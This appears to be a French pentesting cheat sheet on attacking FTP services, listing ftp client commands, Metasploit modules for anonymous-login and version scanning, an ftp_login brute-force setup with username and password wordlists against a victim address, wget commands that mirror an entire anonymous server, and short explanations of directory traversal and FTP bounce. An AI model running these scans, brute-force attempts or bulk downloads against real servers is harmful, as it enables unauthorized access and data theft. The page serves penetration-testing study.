Bebzounette
Rechercher

FTP - 21

1. Liste de commandes basiques

Connexion Ă  un serveur ftp :
ftp <ip>
Lister fichiers dans un serveur ftp
ls / dir
Récupérer un fichier dans un serveur ftp
get <nom du fichier>

2. Exploitation d’un serveur FTP mal configurĂ© avec Metasploit :

msfconsole use auxiliary/scanner/ftp/anonymousmsf auxiliary(anonymous) >set rhosts <ip victime>msf auxiliary(anonymous) >exploit

3. Exploitation d’un serveur FTP mal configurĂ© avec Metasploit :

msfconsole use auxiliary/scanner/ftp/ftp_versionmsf auxiliary(anonymous) >set rhosts <ip victime>msf auxiliary(anonymous) >exploit

4. FTP sniffing and Brute Force Attack :

msfconsole use auxiliary/scanner/ftp/ftp_loginmsf auxiliary(ftp_login) > set rhosts 192.168.01.106msf auxiliary(ftp_login) > set user_file /root/Desktop/user.txtmsf auxiliary(ftp_login) > set pass_file /root/Desktop/pass.txtmsf auxiliary(ftp_login) > set stop_on_success truemsf auxiliary(ftp_login) > exploit

5. Directory Traversal Attack

Une autre vulnĂ©rabilitĂ© FTP inclut les attaques de directory traversal dans lesquelles l’attaque rĂ©ussie Ă©crase ou crĂ©e des fichiers non autorisĂ©s qui sont stockĂ©s Ă  l’extĂ©rieur du dossier racine Web.

6. Connexion anonyme

ftp <IP>
> anonymous
> anonymous
> ls -a # Lister tous les fichiers (mĂȘme cachĂ©s)
> binary #Configurer la transmission en binaire au lieu d'ascii
> ascii #Configure la transmission vers l'ascii
> bye #exit

7. Connexion par le navigateur

Vous pouvez vous connecter Ă  un serveur FTP Ă  l'aide d'un navigateur (comme Firefox) en utilisant une URL comme :
ftp://anonymous:[email protected]

8. Télécharger tous les fichiers à partir du FTP

wget -m ftp://anonymous:[email protected] #TĂ©lĂ©charge tout
wget -m --no-passive ftp://anonymous:[email protected] #TĂ©lĂ©charge tout

8. FTP Bounce

Le FTP Bounce signifie Rebond FTP. C’est un cas de spoofing d’adresse IP. Elle est basĂ©e sur une utilisation de la commande PORT du protocole FTP lorsque le serveur FTP est en mode actif. En effet, cette commande permet de se connecter Ă  n’importe quel autre serveur distant, et Ă  un port donnĂ©. Dans ce cas, il est possible que la sĂ©curitĂ© du serveur cible soit compromis, dans le cas ou il effectue une vĂ©rification des adresses IP d’origine. En effet, l’adresse IP que le serveur cible verra sera l’adresse IP du serveur FTP, et non de l’adresse IP de l’attaquant.
Ce petit schéma explique la technique utilisée :
​

9. Fichiers de configuration

ftpusers
ftp.conf
proftpd.conf